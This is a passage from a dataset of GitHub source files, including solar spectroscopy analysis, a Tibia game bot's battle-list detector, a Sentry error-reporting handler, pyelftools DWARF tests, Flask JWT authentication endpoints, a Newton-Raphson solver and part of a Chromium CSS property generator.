{\"El\":3.6864,\"gf\":-1.018,\"lam\":640.8017,\"dep\":0.562,\"name\":\"Fe I\"}\r\nSiI2 = {\"El\":5.9841,\"gf\":-1.554,\"lam\":640.8670,\"dep\":0.098,\"name\":\"Si I\"}\r\n\r\n#Hand placed limits from mean(axis=0)\r\nwFeI = [1359,1388]\r\nwMyst = [652, 721];\r\nwSiI = [478, 518];\r\nwFeI2 = [377, 438];\r\nwSiI2 = [310, 340];\r\n\r\nsf_qu1 = spc.SpectraFactory(\"data/6405_aS1\",framerows=800,framecols=1472)\r\nsf_qu1.frame_col_cut([0,1471])\r\nsf_qu1.frame_row_cut([0]+list(range(668,677))+[799])\r\nsf_qu1.contrast_cut(50)\r\nsf_qu1.set_continua(\"segments\")\r\n\r\nqu1 = sf_qu1.make_spectra()\r\nqu1m = qu1[:,:].mean(axis=0) \r\nqu1con = qu1.meta.cont[0]*qu1.lmbd.mean() + qu1.meta.cont[1]\r\n\r\nqu1FeI = spc.splineline(wFeI, FeI, qu1.meta);qu1FeI.recenter(qu1m)\r\nqu1Myst = spc.splineline(wMyst, Myst, qu1.meta);qu1Myst.recenter(qu1m)\r\nqu1SiI = spc.splineline(wSiI, SiI, qu1.meta);qu1SiI.recenter(qu1m)\r\nqu1FeI2 = spc.splineline(wFeI2, FeI2, qu1.meta);qu1FeI2.recenter(qu1m)\r\nqu1SiI2 = spc.splineline(wSiI2, SiI2, qu1.meta);qu1SiI2.recenter(qu1m)\r\nqu1lines = [qu1FeI,qu1Myst,qu1SiI,qu1FeI2,qu1SiI2] # ... and save in this list for qu1 \r\n\r\nsf_qu2 = spc.SpectraFactory(\"data/6405_bS1\",framerows=756,framecols=1472)\r\nsf_qu2.frame_col_cut([0,1,1471])\r\nsf_qu2.frame_row_cut([0]+list(range(663,670))+[799])\r\nsf_qu2.contrast_cut(50)\r\nsf_qu2.set_continua(\"segments\")\r\nqu2 = sf_qu2.make_spectra()\r\nqu2con = qu2.meta.cont[0]*qu2.lmbd.mean() + qu2.meta.cont[1]\r\n\r\nqu2FeI = spc.splineline(wFeI, FeI, qu2.meta)\r\nqu2Myst = spc.splineline(wMyst, Myst, qu2.meta)\r\nqu2SiI = spc.splineline(wSiI, SiI, qu2.meta)\r\nqu2FeI2 = spc.splineline(wFeI2, FeI2, qu2.meta)\r\nqu2SiI2 = spc.splineline(wSiI2, SiI2, qu2.meta)\r\nqu2lines = [qu2FeI,qu2Myst,qu2SiI,qu2FeI2,qu2SiI2] # ... and save in this list for qu2 \r\n\r\n\r\n#Hand placed limits from mean(axis=0)\r\nwMyst = [797, 850]\r\nwSiI = [611, 647]\r\nwFeI2 = [505, 571]\r\nwSiI2 = [442, 470]\r\n\r\nsf_spt = spc.SpectraFactory(\"data/6405_aS2\",framerows=774,framecols=1446)\r\nsf_spt.frame_col_cut([0,1445])\r\nsf_spt.frame_row_cut([0]+list(range(659,668))+[743])\r\nsf_spt.contrast_cut(85)\r\nsf_spt.set_continua(\"segments\")\r\n\r\nspt = sf_spt.make_spectra()\r\nsptm = spt[:,:].mean(axis=0) \r\nsptcon = spt.meta.cont[0]*spt.lmbd.mean() + spt.meta.cont[1]\r\n\r\nsptMyst = spc.splineline(wMyst, Myst, spt.meta);sptMyst.recenter(sptm)\r\nsptSiI = spc.splineline(wSiI, SiI, spt.meta);sptSiI.recenter(sptm)\r\nsptFeI2 = spc.splineline(wFeI2, FeI2, spt.meta);sptFeI2.recenter(sptm)\r\nsptSiI2 = spc.splineline(wSiI2, SiI2, spt.meta);sptSiI2.recenter(sptm)\r\nsptlines = [sptMyst,sptSiI,sptFeI2,sptSiI2] # ... 
and save in this list for spt \n\num = 0.38978\nwl = 0.64927\npn = 0.83791\n\nxspotlims = (640.38104838709671, 640.69435483870961)\nyspotlims = (0.86458333333333337, 1.0437500000000002)\n\nqu1lims = {}\nqu1lims[\"ewlim\"] = (-0.5 , 2.5 )\nqu1lims[\"vellim\"] = (-10 , 10 )\nqu1lims[\"rellim\"] = ( 0.2, 1.1)\nqu1lims[\"fw13lim\"] = (-0.1 , 1.4 )\nqu1lims[\"fwhmlim\"] = (-0.1 , 1.4 )\nqu1lims[\"fw23lim\"] = (-0.1 , 1.4 )\nqu1lims[\"as13lim\"] = (-0.7 , 0.7 )\nqu1lims[\"as12lim\"] = (-0.8 , 0.7 )\nqu1lims[\"as23lim\"] = (-1.1 , 0.6 )\n\nqu2lims = {}\nqu2lims[\"ewlim\"] = (-0.5 , 2.5 )\nqu2lims[\"vellim\"] = (-10 , 10 )\nqu2lims[\"rellim\"] = ( 0.1 , 1.3 )\nqu2lims[\"fw13lim\"] = (-0.2 , 1.2 )\nqu2lims[\"fwhmlim\"] = (-0.1 , 1.2 )\nqu2lims[\"fw23lim\"] = (-0.2 , 1.2 )\nqu2lims[\"as13lim\"] = (-0.7 , 0.7 )\nqu2lims[\"as12lim\"] = (-0.8 , 0.7 )\nqu2lims[\"as23lim\"] = (-1.1 , 0.6 )\n\nsptlims = {}\nsptlims[\"ewlim\"] = ( 0.3 , 2.1 )\nsptlims[\"vellim\"] = (-8 , 8 )\nsptlims[\"rellim\"] = ( 0.2, 1.01)\nsptlims[\"fw13lim\"] = (-0.2 , 2 )\nsptlims[\"fwhmlim\"] = (-0.3 , 3 )\nsptlims[\"fw23lim\"] = (-0.4 , 3 )\nsptlims[\"as13lim\"] = (-1.5 , 0.74)\nsptlims[\"as12lim\"] = (-2.0 , 0.74)\nsptlims[\"as23lim\"] = (-2.0 , 0.84)\n\n# Sunspot measurement\nif False:\n umbra = 0.35\n wall = (0.35,0.75)\n penumbra = (0.75,0.89)\n quiet = (0.89)\n as2um = s2.make_spectra_subset(as2,rowsubset=(as2con < umbra),desc=\"Umbra subset\")\n as2wl = s2.make_spectra_subset(as2,rowsubset=((as2con >= wall[0]) & (as2con <= wall[1])),desc=\"Umbra/penumbra wall\")\n as2pn = s2.make_spectra_subset(as2,rowsubset=((as2con > penumbra[0]) & (as2con < penumbra[1])),desc=\"Penumbra\")\n as2qu = s2.make_spectra_subset(as2,rowsubset=(as2con >= quiet),desc=\"Quiet sun\")\n \n pl.plot(as2um.lmbd, as2um[:,:].mean(axis=0));pl.show()\n\nif False:\n # For spline measurement\n bot,cnt,fwhm,as12,fw13,as13,fw23,as23,err,ew,cont = np.arange(0,11)\n\n wFlat = [1179,1239];\n wH2O = [289, 342]; cH2O = 640.86681253796701\n wFeI = [376, 441]; cFeI = 640.80263785584464\n wSiFe = [467, 519]; cSiFe = 640.72889305314993\n wMyst = [646, 722]; cMyst = 640.57558287431198 #Hand placed limits from mean(axis=0)\n wCNq = [1006,1047]; cCNq = 640.31162454661717 #Hand placed limits from mean(axis=0)\n\n Myst = spc.splineline(wMyst,cMyst,as1.meta)\n FeI = spc.splineline(wFeI ,cFeI ,as1.meta)\n SiFe = spc.splineline(wSiFe,cSiFe,as1.meta)\n H2O = spc.splineline(wH2O ,cH2O ,as1.meta)\n\n print(\"Measuring unknown line\")\n# mesMyst = Myst.measure(as1)\n print(\"Measuring Atmo H2O line\")\n# mesH2O = H2O.measure(as1) # Seems to depend on continuua, so probably not atmo line?\n print(\"Measuring Iron line\")\n# mesFeI = FeI.measure(as1)\n print(\"Measuring Si + Fe line\")\n mesSiFe = SiFe.measure(as1)\n linmap = vis.spline_linemap(mesSiFe,SiFe)\n npz = np.load(\"SplineError.estimate.npz\")\n errs,vals = npz[\"arr_0\"],npz[\"arr_1\"]\n intrErr = er.make_intr_errs(errs,vals) \n errSiFe = er.scale_intr_spline_err(mesSiFe,SiFe,intrErr)\n vis.dan_errplot(linmap,errSiFe).show()\n# pl.plot(mesMyst[:,cont],mesMyst[:,bot],'o')\n# err = np.load(\"Estimate_errSiFe.npy\")\n# errSiFe = er.scale_spline_err(SiFe,mesSiFe,err)\n","repo_name":"Tobychev/Danspectra","sub_path":"6405.py","file_name":"6405.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9798345029","text":"from ScreenAnalizerPackage.Scanner import Scanner\nfrom ScreenAnalizerPackage.ScreenRegion import 
ScreenRegion\nfrom ScreenAnalizerPackage.Error.NoEnemyFound import NoEnemyFound\nfrom FilesystemPackage import Cv2File\nfrom UtilPackage import String\nimport numpy as np\nimport cv2\nfrom .Enemy import Enemy\nfrom .ScriptEnemy import ScriptEnemy\n\n\nclass BattleList:\n BATTLE_LIST_WIDGET_HEIGHT = 180\n\n @staticmethod\n def create(frame: np.array) -> 'BattleList':\n (left, top, width, height) = Scanner.player_battle_list_position(frame)\n\n start_x = left\n end_x = left + width\n start_y = top\n end_y = top + height + BattleList.BATTLE_LIST_WIDGET_HEIGHT\n\n return BattleList(ScreenRegion(start_x, end_x, start_y, end_y))\n\n def __init__(self, region: ScreenRegion):\n self.region = region\n\n def find_enemies(self, frame: np.array, enemies: list[ScriptEnemy]) -> list[Enemy]:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n battle_list_roi = frame[self.region.start_y: self.region.end_y, self.region.start_x: self.region.end_x]\n\n results = list()\n\n for enemy in enemies:\n enemy_path = f'Wiki/Ui/Battle/Mobs/{String.snake_to_camel_case(enemy.name)}/{enemy.name}_label.png'\n creature_template = Cv2File.load_image(enemy_path)\n\n match = cv2.matchTemplate(battle_list_roi, creature_template, cv2.TM_CCOEFF_NORMED)\n\n # match_locations = (y_match_coords, x_match_coords) >= similarity more than threshold\n match_locations = np.where(match >= 0.9)\n\n # paired_match_locations = [(x, y), (x, y)]\n paired_match_locations = list(zip(*match_locations[::-1]))\n\n ordered_match_locations = sorted(paired_match_locations, key=lambda pair: pair[1], reverse=False)\n\n if ordered_match_locations:\n for (nearest_creature_battle_list_roi_x, nearest_creature_battle_list_roi_y) in ordered_match_locations:\n creature_template_height, creature_template_width = creature_template.shape\n\n frame_creature_position_start_x = self.region.start_x + nearest_creature_battle_list_roi_x\n frame_creature_position_start_y = self.region.start_y + nearest_creature_battle_list_roi_y\n frame_creature_end_x = frame_creature_position_start_x + creature_template_width\n frame_creature_end_y = frame_creature_position_start_y + creature_template_height\n\n battle_list_position = ScreenRegion(\n frame_creature_position_start_x,\n frame_creature_end_x,\n frame_creature_position_start_y,\n frame_creature_end_y\n )\n\n creature = Enemy(enemy.name, enemy.runner, enemy.loot, battle_list_position)\n\n results.append(creature)\n\n if not results:\n raise NoEnemyFound()\n\n return results\n\n def is_nearest_enemy_attacked(self, frame: np.array, nearest_creature_region: ScreenRegion) -> bool:\n start_x = nearest_creature_region.start_x\n start_y = nearest_creature_region.start_y\n end_y = nearest_creature_region.end_y\n\n battle_list_attack_template = Cv2File.load_image(\n 'Wiki/Ui/Battle/Mobs/creature_attacked_placeholder.png',\n grey_scale=False\n )\n\n template_width, *_ = battle_list_attack_template.shape\n\n battle_list_roi = frame[start_y: end_y, start_x - 4: start_x]\n\n battle_list_roi_hsv = cv2.cvtColor(battle_list_roi, cv2.COLOR_BGR2HSV)\n\n # create a red color range\n lower_red = np.array([0, 50, 50])\n upper_red = np.array([10, 255, 255])\n\n # check if red color is present in the roi image\n mask = cv2.inRange(battle_list_roi_hsv, lower_red, upper_red)\n\n return np.any(mask == 255)\n","repo_name":"Adriein/TibiaAcBot","sub_path":"CaveBot/BattleList.py","file_name":"BattleList.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} 
+{"seq_id":"35654084516","text":"from ppg_runtime.excepthook import ExceptionHandler\nfrom ppg_runtime.excepthook._util import RateLimiter\n\nimport sentry_sdk\n\nclass SentryExceptionHandler(ExceptionHandler):\n \"\"\"\n Send stack traces to Sentry. For instructions on how to set this up, see:\n\n https://build-system.fman.io/manual/#error-tracking\n\n A property of interest in this class is .scope: It lets you send additional\n context information to Sentry, such as the user's operating system, or their\n email. These data are then displayed alongside any stack traces in Sentry.\n\n A limitation of .scope is that it is only available once .init() was called.\n fbs's ApplicationContext performs this call automatically for handlers\n listed in the .exception_handlers property.\n\n The recommended way for setting context information is to use the `callback`\n parameter. You can see its use near the bottom of the following snippet:\n\n from fbs_runtime import platform\n from fbs_runtime.application_context import ApplicationContext, \\\n cached_property, is_frozen\n\n class AppContext(ApplicationContext):\n ...\n @cached_property\n def exception_handlers(self):\n result = super().exception_handlers\n if is_frozen():\n result.append(self.sentry)\n return result\n @cached_property\n def sentry(self):\n # The Sentry client key. Eg. https://4e78a0...@sentry.io/12345.\n dsn = self.build_settings['sentry_dsn']\n # Your app version. Eg. 1.2.3:\n version = self.build_settings['version']\n # The environment in which your app is running. \"local\" by\n # default, but set to \"production\" when you do `fbs release`.\n environment = self.build_settings['environment']\n return SentryExceptionHandler(\n dsn, version, environment, callback=self._on_sentry_init\n )\n def _on_sentry_init(self):\n self.sentry.scope.set_extra('os', platform.name())\n self.sentry.scope.user = {'id': 41, 'email': 'john@gmail.com'}\n\n The optional `rate_limit` parameter to the constructor lets you limit the\n number of requests per minute. It is there to prevent a single client from\n clogging up your Sentry logs.\n \"\"\"\n def __init__(\n self, dsn, app_version, environment, callback=lambda: None,\n rate_limit=10\n ):\n super().__init__()\n self.scope = None\n self._dsn = dsn\n self._app_version = app_version\n self._environment = environment\n self._callback = callback\n self._rate_limiter = RateLimiter(60, rate_limit)\n def init(self):\n sentry_sdk.init(\n self._dsn, release=self._app_version, environment=self._environment,\n attach_stacktrace=True, default_integrations=False\n )\n # Sentry doesn't give us an easy way to set context information\n # globally, for all threads. 
We work around this by maintaining a\n        # reference to \"the\" main scope:\n        self.scope = sentry_sdk.configure_scope().__enter__()\n        self._callback()\n    def handle(self, exc_type, exc_value, enriched_tb):\n        if self._rate_limiter.please():\n            sentry_sdk.capture_exception((exc_type, exc_value, enriched_tb))","repo_name":"runesc/PPG","sub_path":"ppg_runtime/excepthook/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"52"} +{"seq_id":"12733084095","text":"#-------------------------------------------------------------------------------\n# elftools tests\n#\n# Eli Bendersky (eliben@gmail.com)\n# This code is in the public domain\n#-------------------------------------------------------------------------------\ntry:\n    import unittest2 as unittest\nexcept ImportError:\n    import unittest\n\nfrom utils import setup_syspath; setup_syspath()\nfrom elftools.common.py3compat import BytesIO, iteritems\nfrom elftools.dwarf.lineprogram import LineProgram, LineState, LineProgramEntry\nfrom elftools.dwarf.structs import DWARFStructs\nfrom elftools.dwarf.constants import *\n\n\nclass TestLineProgram(unittest.TestCase):\n    def _make_program_in_stream(self, stream):\n        \"\"\" Create a LineProgram from the given program encoded in a stream\n        \"\"\"\n        ds = DWARFStructs(little_endian=True, dwarf_format=32, address_size=4)\n        header = ds.Dwarf_lineprog_header.parse(\n            b'\\x04\\x10\\x00\\x00' +    # initial length\n            b'\\x03\\x00' +            # version\n            b'\\x20\\x00\\x00\\x00' +    # header length\n            b'\\x01\\x01\\x01\\x0F' +    # flags\n            b'\\x0A' +                # opcode_base\n            b'\\x00\\x01\\x04\\x08\\x0C\\x01\\x01\\x01\\x00' +    # standard_opcode_lengths\n            # 2 dir names followed by a NULL\n            b'\\x61\\x62\\x00\\x70\\x00\\x00' +\n            # a file entry\n            b'\\x61\\x72\\x00\\x0C\\x0D\\x0F' +\n            # and another entry\n            b'\\x45\\x50\\x51\\x00\\x86\\x12\\x07\\x08' +\n            # followed by NULL\n            b'\\x00')\n\n        lp = LineProgram(header, stream, ds, 0, len(stream.getvalue()))\n        return lp\n\n    def assertLineState(self, state, **kwargs):\n        \"\"\" Assert that the state attributes specified in kwargs have the given\n            values (the rest are default).\n        \"\"\"\n        for k, v in iteritems(kwargs):\n            self.assertEqual(getattr(state, k), v)\n\n    def test_spec_sample_59(self):\n        # Sample in figure 59 of DWARFv3\n        s = BytesIO()\n        s.write(\n            b'\\x02\\xb9\\x04' +\n            b'\\x0b' +\n            b'\\x38' +\n            b'\\x82' +\n            b'\\x73' +\n            b'\\x02\\x02' +\n            b'\\x00\\x01\\x01')\n\n        lp = self._make_program_in_stream(s)\n        linetable = lp.get_entries()\n\n        self.assertEqual(len(linetable), 7)\n        self.assertIs(linetable[0].state, None) # doesn't modify state\n        self.assertEqual(linetable[0].command, DW_LNS_advance_pc)\n        self.assertEqual(linetable[0].args, [0x239])\n        self.assertLineState(linetable[1].state, address=0x239, line=3)\n        self.assertEqual(linetable[1].command, 0xb)\n        self.assertEqual(linetable[1].args, [2, 0])\n        self.assertLineState(linetable[2].state, address=0x23c, line=5)\n        self.assertLineState(linetable[3].state, address=0x244, line=6)\n        self.assertLineState(linetable[4].state, address=0x24b, line=7, end_sequence=False)\n        self.assertEqual(linetable[5].command, DW_LNS_advance_pc)\n        self.assertEqual(linetable[5].args, [2])\n        self.assertLineState(linetable[6].state, address=0x24d, line=7, end_sequence=True)\n\n    def test_spec_sample_60(self):\n        # Sample in figure 60 of DWARFv3\n        s = BytesIO()\n        s.write(\n            b'\\x09\\x39\\x02' +\n            b'\\x0b' +\n            b'\\x09\\x03\\x00' +\n            b'\\x0b' +\n            b'\\x09\\x08\\x00' +\n            b'\\x0a' +\n            
b'\\x09\\x07\\x00' +\n b'\\x0a' +\n b'\\x09\\x02\\x00' +\n b'\\x00\\x01\\x01')\n\n lp = self._make_program_in_stream(s)\n linetable = lp.get_entries()\n\n self.assertEqual(len(linetable), 10)\n self.assertIs(linetable[0].state, None) # doesn't modify state\n self.assertEqual(linetable[0].command, DW_LNS_fixed_advance_pc)\n self.assertEqual(linetable[0].args, [0x239])\n self.assertLineState(linetable[1].state, address=0x239, line=3)\n self.assertLineState(linetable[3].state, address=0x23c, line=5)\n self.assertLineState(linetable[5].state, address=0x244, line=6)\n self.assertLineState(linetable[7].state, address=0x24b, line=7, end_sequence=False)\n self.assertLineState(linetable[9].state, address=0x24d, line=7, end_sequence=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"kiwibrowser/src","sub_path":"third_party/pyelftools/test/test_dwarf_lineprogram.py","file_name":"test_dwarf_lineprogram.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"10889126582","text":"from flask import request, jsonify\nfrom flask_jwt_extended import (\n create_access_token,\n create_refresh_token,\n get_jwt,\n jwt_required,\n)\n\nfrom database.models import User, Snippet, Collection\nfrom database.models import TokenBlocklist\n\nfrom flask_restful import Resource\nimport datetime\n\nfrom mongoengine.errors import FieldDoesNotExist, NotUniqueError, DoesNotExist\nfrom resources.errors import (\n SchemaValidationError,\n UsernameAlreadyExistsError,\n EmailAlreadyExistsError,\n UnauthorizedError,\n InternalServerError,\n)\n\n#===========================================================================\n# * User Authentication RESTful Resource\n# ? Queries User objects against the User model.\n# All POST methods.\n# Responsible for attaching tokens and hashed passwords to a User doc model,\n# required to perform operations on a Snippet, a Collection and itself.\n#===========================================================================\n\nclass SignupApi(Resource):\n \"\"\"Requests against the Snippet model to `api/auth/signup`\"\"\"\n\n def post(self):\n \"\"\"Create a new User object following the User model.\n\n Yields:\n Save a new User with the required username, email, password\n fields.\n Hash the password.\n Create three Snippets for the user to have some UI to play with\n upon authentication.\n Flags:\n Errors and returns status code with error message,\n 200, otherwise.\n Returns:\n {dict}: JSON Flask Response\n with an access token and a username.\n sets a refresh cookie in headers.\n Note:\n The computation to update, save, reload a Snippet is required to\n ensure Objects have fully landed before they are referenced. 
It is extra \n complicated for this endpoint as we are awaiting reloads for three models:\n User, Collection and Snippet, all of which vary in `having to exist` before\n the other.\n \"\"\"\n try:\n body = request.get_json()\n user = User(**body)\n\n user.hash_password()\n user.save()\n user.reload()\n\n now = datetime.datetime.now(datetime.timezone.utc)\n\n id = user.id\n username = user.username\n \n # Required to instantiate a new reference to the very same \n # and very new User for the purposes of attaching an owner \n # to the snippets.\n saved_user = User.objects.get(username=username)\n\n snippet_py = Snippet(\n title=\"{}.py\".format(username),\n tags=[\"first post\"],\n description=\"From Cheat-Hub\",\n language=\"python\",\n value=\"print('hello {}')\".format(username),\n addedBy=saved_user,\n addedOn=now,\n )\n\n snippet_js = Snippet(\n title=\"{}.js\".format(username),\n tags=[\"first post\"],\n description=\"From Cheat-Hub\",\n language=\"javascript\",\n value=\"console.log('hello {}');\".format(username),\n addedBy=saved_user,\n addedOn=now,\n )\n\n snippet_sh = Snippet(\n title=\"{}.sh\".format(username),\n tags=[\"first post\"],\n description=\"From Cheat-Hub\",\n language=\"bash\",\n value=\"#!/bin/bash\\n\\necho 'hello {}'\".format(username),\n addedBy=saved_user,\n addedOn=now,\n )\n\n snippet_py.save()\n snippet_py.reload()\n snippet_js.save()\n snippet_js.reload()\n snippet_sh.save()\n snippet_sh.reload()\n\n user.update(push_all__snippets_created=[snippet_py, snippet_js, snippet_sh])\n user.save()\n user.reload()\n\n collection = Collection(\n name=\"Greetings {}\".format(username),\n snippets=[snippet_py, snippet_js, snippet_sh],\n date=now,\n owner=user,\n )\n\n collection.save()\n\n user.update(push__collections=collection)\n user.save()\n\n expires = datetime.timedelta(hours=3)\n access_token = create_access_token(\n identity=str(username), expires_delta=expires\n )\n refresh_token = create_refresh_token(\n identity=str(id), expires_delta=expires\n )\n refresh_cookie = [(\"Set-Cookie\", \"refresh_token={}\".format(refresh_token))]\n\n return (\n {\n \"access_token\": access_token,\n \"username\": username,\n },\n 200,\n refresh_cookie,\n )\n\n except FieldDoesNotExist:\n return {\"message\": \"Request is missing required fields.\"}, 400\n\n except NotUniqueError:\n return {\"message\": \"User with given email address already exists.\"}, 401\n\n except Exception as e:\n return {\"message\": \"Something went wrong.\"}, 500\n\n\nclass LoginApi(Resource):\n \"\"\"Requests against the Snippet model to `api/auth/login`\"\"\"\n\n def post(self):\n \"\"\"Authenticate a User object against the User model.\n\n Yields:\n Check the email.\n Check the password.\n Flags:\n Errors and returns status code with error message,\n 200, otherwise.\n Returns:\n {dict}: JSON Flask Response\n with an access token and a username.\n sets a refresh-cookie in headers.\n \"\"\"\n try:\n body = request.get_json()\n user = User.objects.get(email=body.get(\"email\"))\n authorized = user.check_password(body.get(\"password\"))\n if not authorized:\n raise UnauthorizedError\n\n user.update(set__online=True)\n user.save()\n\n expires = datetime.timedelta(hours=3)\n access_token = create_access_token(\n identity=str(user.username), expires_delta=expires\n )\n refresh_token = create_refresh_token(\n identity=str(user.id), expires_delta=expires\n )\n refresh_cookie = [(\"Set-Cookie\", \"refresh_token={}\".format(refresh_token))]\n\n return (\n {\n \"access_token\": access_token,\n \"username\": 
user.username,\n                },\n                200,\n                refresh_cookie,\n            )\n\n        except (UnauthorizedError, DoesNotExist):\n            return {\"message\": \"Invalid username or password.\"}, 401\n\n        except Exception as e:\n            return {\"message\": \"Something went wrong.\"}, 500\n\n\nclass LogoutApi(Resource):\n    \"\"\"Requests against the Snippet model to `api/auth/logout`\"\"\"\n\n    @jwt_required()\n    def post(self):\n        \"\"\"Create a new TokenBlockList document following a User's logout request.\n\n        Yields:\n            Save an exiting User's access token to the TokenBlockList database.\n            This prevents the access token from being used between the logout event\n            and its expiration.\n        Flags:\n            Errors and returns status code with error message,\n            200, otherwise.\n        Returns:\n            {dict}: JSON Flask Response\n                confirmation that the token has been revoked.\n\n        \"\"\"\n        revoked_token = get_jwt()\n\n        jti = revoked_token[\"jti\"]\n        owner = revoked_token[\"sub\"]\n        created_ts = int(revoked_token[\"iat\"])\n        expires_ts = int(revoked_token[\"exp\"])\n\n        created = datetime.datetime.utcfromtimestamp(created_ts).strftime(\n            \"%Y-%m-%d %H:%M:%S\"\n        )\n        expires = datetime.datetime.utcfromtimestamp(expires_ts).strftime(\n            \"%Y-%m-%d %H:%M:%S\"\n        )\n\n        user = User.objects.get(username=owner)\n        now = datetime.datetime.now(datetime.timezone.utc)\n\n        block_token = TokenBlocklist(\n            jti=jti,\n            created_on=created,\n            expires_on=expires,\n            revoked_on=now,\n            revoked_by=user,\n        )\n        block_token.save()\n\n        user.update(set__online=False)\n\n        return {\"message\": \"JWT revoked\"}\n","repo_name":"israelias/cheathub","sub_path":"backend/resources/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":8429,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"30039255495","text":"import math #just if you need to use\nimport numpy #just if you need to use\n\n# Defining ANY Function\ndef f(x):\n    f = pow(x,3) - 5*x - 9 # This is just an example\n    return f \n# Defining derivative of the function defined above\ndef df(x):\n    df = 3*pow(x,2) - 5 # This is just an example\n    return df \n    \n# Implementing 1D Newton Raphson Method\ndef newtonRaphson(x0,e,n):\n    i = 1\n    flag = 1\n    condition = True\n    while condition:\n        # If the derivative is zero, print an error message and stop. This is\n        # one way (though not the only one) to handle the problem; an algebraic\n        # or numerical workaround could be used here instead.\n        if df(x0) == 0:\n            print('Divide by zero error!')\n            break\n        x1 = x0 - f(x0)/df(x0)\n        print('Iteration-%d, x = %0.12f and f(x) = %0.12f' % (i, x1, f(x1)))\n        x0 = x1\n        i += 1\n        if i > n:\n            flag = 0\n            break\n        condition = abs(f(x1)) > e\n    if flag == 1:\n        print('\\nThe root is: %0.12f' % x1)\n    else:\n        print('\\nNot Convergent. 
Maybe you can try a bigger number of iterations.')\n# Input Section\nx0 = float(input('Enter Guess: '))\ne = float(input('Tolerable Error: '))\nn = int(input('Maximum Step: '))\n\n# Starting Newton Raphson Method\nnewtonRaphson(x0,e,n)\n","repo_name":"jgmarquesm/Python","sub_path":"Numerical-Methods/1D Newton-Raphson Method/1D-Newton-Raphson-Method.py","file_name":"1D-Newton-Raphson-Method.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"12449079275","text":"import json5_generator\nfrom name_utilities import (\n    upper_camel_case,\n    lower_camel_case,\n    enum_value_name,\n    enum_for_css_property,\n    enum_for_css_property_alias\n)\nfrom core.css.field_alias_expander import FieldAliasExpander\n\n\n# These values are converted using CSSPrimitiveValue in the setter function,\n# if applicable.\nPRIMITIVE_TYPES = [\n    'short',\n    'unsigned short',\n    'int',\n    'unsigned int',\n    'unsigned',\n    'float',\n    'LineClampValue'\n]\n\n\n# Check properties parameters are valid.\n# TODO(jiameng): add more flag checks later.\ndef check_property_parameters(property_to_check):\n    # Only longhand properties can be interpolable.\n    if property_to_check['longhands']:\n        assert not(property_to_check['interpolable']), \\\n            'Shorthand property (' + property_to_check['name'] + ') ' \\\n            'cannot be interpolable'\n    if property_to_check['longhands']:\n        assert 'parseSingleValue' not in property_to_check['property_methods'], \\\n            'Shorthand property (' + property_to_check['name'] + ') ' \\\n            'should not implement parseSingleValue'\n    else:\n        assert 'parseShorthand' not in property_to_check['property_methods'], \\\n            'Longhand property (' + property_to_check['name'] + ') ' \\\n            'should not implement parseShorthand'\n    assert property_to_check['is_descriptor'] or \\\n        property_to_check['is_property'], \\\n        '{} must be a property, descriptor, or both'.format(\n            property_to_check['name'])\n    if property_to_check['field_template'] is not None:\n        assert not property_to_check['longhands'], \\\n            \"Shorthand '{}' cannot have a field_template.\".format(\n                property_to_check['name'])\n    if property_to_check['mutable']:\n        assert property_to_check['field_template'] == 'monotonic_flag', \\\n            'mutable keyword only implemented for monotonic_flag'\n\n\nclass CSSProperties(object):\n    def __init__(self, file_paths):\n        assert len(file_paths) >= 2, \\\n            \"CSSProperties at least needs both CSSProperties.json5 and \\\n            ComputedStyleFieldAliases.json5 to function\"\n\n        # ComputedStyleFieldAliases.json5. Used to expand out parameters used\n        # in the various generators for ComputedStyle.\n        self._field_alias_expander = FieldAliasExpander(file_paths[1])\n\n        # CSSPropertyValueMetadata assumes that there are at most 1024\n        # properties + aliases.\n        self._alias_offset = 512\n        # 0: CSSPropertyInvalid\n        # 1: CSSPropertyVariable\n        self._first_enum_value = 2\n        self._last_used_enum_value = self._first_enum_value\n\n        self._properties_by_id = {}\n        self._aliases = []\n        self._longhands = []\n        self._shorthands = []\n        self._properties_including_aliases = []\n\n        # Add default data in CSSProperties.json5. 
This must be consistent\n # across instantiations of this class.\n css_properties_file = json5_generator.Json5File.load_from_files(\n [file_paths[0]])\n self._default_parameters = css_properties_file.parameters\n self.add_properties(css_properties_file.name_dictionaries)\n\n assert self._first_enum_value + len(self._properties_by_id) < \\\n self._alias_offset, \\\n 'Property aliasing expects fewer than %d properties.' % \\\n self._alias_offset\n self._last_unresolved_property_id = max(\n property_[\"enum_value\"] for property_ in self._aliases)\n\n # Process extra files passed in.\n self._extra_fields = []\n for i in range(2, len(file_paths)):\n fields = json5_generator.Json5File.load_from_files(\n [file_paths[i]],\n default_parameters=self._default_parameters)\n self._extra_fields.extend(fields.name_dictionaries)\n for field in self._extra_fields:\n self.expand_parameters(field)\n\n def add_properties(self, properties):\n self._aliases = [\n property_ for property_ in properties if property_['alias_for']]\n self._shorthands = [\n property_ for property_ in properties if property_['longhands']]\n self._longhands = [\n property_ for property_ in properties if (\n not property_['alias_for'] and not property_['longhands'])]\n\n # Sort the properties by priority, then alphabetically. Ensure that\n # the resulting order is deterministic.\n # Sort properties by priority, then alphabetically.\n for property_ in self._longhands + self._shorthands:\n self.expand_parameters(property_)\n check_property_parameters(property_)\n # This order must match the order in CSSPropertyPriority.h.\n priority_numbers = {'Animation': 0, 'High': 1, 'Low': 2}\n priority = priority_numbers[property_['priority']]\n name_without_leading_dash = property_['name']\n if property_['name'].startswith('-'):\n name_without_leading_dash = property_['name'][1:]\n property_['sorting_key'] = (priority, name_without_leading_dash)\n\n sorting_keys = {}\n for property_ in self._longhands + self._shorthands:\n key = property_['sorting_key']\n assert key not in sorting_keys, \\\n 